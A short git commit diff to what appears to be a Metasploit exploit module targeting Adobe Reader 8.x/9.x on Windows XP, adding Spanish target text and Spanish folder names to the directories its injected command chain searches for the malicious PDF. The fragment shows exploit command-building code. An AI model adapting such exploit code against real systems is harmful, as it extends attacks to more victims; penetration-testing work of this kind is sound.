Add Spanish dir path. Thanks Miguel

unstable
sinn3r 2012-05-15 19:27:48 -05:00
parent 8428d16db3
commit b89e77c842
1 changed files with 2 additions and 2 deletions

View File

@ -50,7 +50,7 @@ class Metasploit3 < Msf::Exploit::Remote
'Platform' => 'win',
'Targets' =>
[
[ 'Adobe Reader v8.x, v9.x (Windows XP SP3 English)', { 'Ret' => '' } ]
[ 'Adobe Reader v8.x, v9.x (Windows XP SP3 English/Spanish)', { 'Ret' => '' } ]
],
'DefaultTarget' => 0))
@ -124,7 +124,7 @@ class Metasploit3 < Msf::Exploit::Remote
output << "%HOMEDRIVE%&cd %HOMEPATH%"
# check for the pdf in these dirs, in this order..
dirs = [ "Desktop", "My Documents", "Documents" ]
dirs = [ "Desktop", "My Documents", "Documents", "Escritorio", "Mis Documentos" ]
dirs.each { |dir|
fmt = "&"+
"("+